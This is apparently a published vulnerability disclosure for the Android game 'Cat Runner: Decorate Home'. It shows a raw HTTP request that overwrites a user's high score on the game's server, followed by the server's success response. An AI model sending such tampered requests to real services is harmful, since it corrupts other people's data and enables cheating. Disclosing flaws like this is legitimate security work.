# Cat Runner: Decorate Home -  External Control of Assumed-Immutable Web Parameter
# Date: Jan 17, 2019
# Software Link: https://play.google.com/store/apps/details?id=com.solou.catendless.run&hl=en
# Version: 2.8.0 Android App
# Vendor: Ivy
# Exploit Author: Loc Phan Van
# Category: Mobile Apps
# Tested on: Android 8.1

# Description
# The application API does not sufficiently verify inputs that are assumed to be immutable but are actually 
# externally controllable. The attackers can manipulate its parameters exchanged between client and server in 
# order to modify application data, and gain benefits for their own account. In this case, the score parameter of # users can be changed externally.

#PoC

Request:

Post //index/commit HTTP/1.1
Content-type: application/x-www-form-urlencoded
X-Unity-Version: 5.6.4f1
User-agent: Dalvik/2.1.0 (Linuxl; U; Android 5.1.1; SN-G920V Build/LVY47X)
Host: card.matchJplay.com
Connection: close
Accept-Encoding: gzip, deflate
Content-Length: 89

uid=1aef329eb95be620abfa417d20112b2e&appid=2419&tag=Highschore&score=151414141&week201903

Response

HTTP/1.1 200 OK
Server: nginx/1.14.0
Date: Thu, 17 Jan 2019 03:49:55 GMT
Content-type: text/hmlt, charset-UTF-8
Connection: close
X-Powered-By: PHP/7.2.6
Content-Length: 28

{"status":1 ,"msg" : "success"}

References:
https://www.youtube.com/watch?v=u5iEeLZnYVg